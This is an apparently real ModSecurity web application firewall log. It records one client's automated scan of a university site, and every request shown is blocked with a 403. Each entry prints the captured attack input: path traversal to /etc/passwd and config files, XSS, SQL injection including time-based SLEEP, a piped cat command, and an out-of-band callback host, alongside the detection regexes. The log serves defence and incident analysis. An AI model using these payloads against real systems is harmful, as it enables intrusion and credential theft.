[Tue Aug 29 11:42:46.593226 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAdTBBkAAAAY"]
[Tue Aug 29 11:42:47.383277 2023] [:error] [pid 1918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13R8Co-f0AAAd@4AEAAAAs"]
[Tue Aug 29 11:42:47.414168 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAcoNkoAAAAF"]
[Tue Aug 29 11:42:48.386247 2023] [:error] [pid 1919] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAd-Fz4AAAAt"]
[Tue Aug 29 11:42:48.410587 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26gcs16cxbcrpg6x.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAeChX8AAAAw"]
[Tue Aug 29 11:42:48.508910 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAc92zwAAAAD"]
[Tue Aug 29 11:42:50.379481 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAdb7mYAAAAb"]
[Tue Aug 29 11:42:51.356799 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAdlvdMAAAAl"]
[Tue Aug 29 11:42:51.364566 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAeoA-EAAAAT"]
[Tue Aug 29 11:42:52.371704 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAeB1pQAAAAv"]
[Tue Aug 29 11:42:53.356687 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAc920UAAAAD"]
[Tue Aug 29 11:42:53.417026 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAdOeTMAAAAS"]
[Tue Aug 29 11:42:54.373721 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAeoA-cAAAAT"]
[Tue Aug 29 11:42:54.385153 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAdSZOMAAAAX"]
[Tue Aug 29 11:42:57.396437 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAdTBCoAAAAY"]
[Tue Aug 29 11:42:59.511974 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAeX1C8AAAAK"]
[Tue Aug 29 11:43:00.426835 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAdOeT8AAAAS"]
[Tue Aug 29 11:43:00.428939 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAd64SwAAAAp"]
[Tue Aug 29 11:43:00.486192 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAcsLH8AAAAE"]
[Tue Aug 29 11:43:02.430791 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAcoNmMAAAAF"]
[Tue Aug 29 11:43:03.420423 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAeYbzUAAAAB"]
[Tue Aug 29 11:43:04.392266 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAeYbzkAAAAB"]
[Tue Aug 29 11:43:04.451661 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAdb7nQAAAAb"]
[Tue Aug 29 11:43:06.395270 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAeYbz4AAAAB"]
[Tue Aug 29 11:43:07.433353 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAdSZPwAAAAX"]
[Tue Aug 29 11:43:08.106643 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAeChaoAAAAw"]
[Tue Aug 29 11:43:08.616430 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAexH@8AAAAN"]
[Tue Aug 29 11:43:09.372093 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAcoNnsAAAAF"]
[Tue Aug 29 11:43:10.404423 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAdftWQAAAAG"]
[Tue Aug 29 11:43:11.467018 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAevkR4AAAAA"]
[Tue Aug 29 11:43:14.456137 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAcsLKUAAAAE"]
[Tue Aug 29 11:43:15.627494 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAdECeoAAAAW"]
[Tue Aug 29 11:43:18.391527 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAe1edsAAAAB"]
[Tue Aug 29 11:43:18.444762 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAc4EpsAAAAP"]
[Tue Aug 29 11:43:20.373522 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAbo-h0AAAAi"]
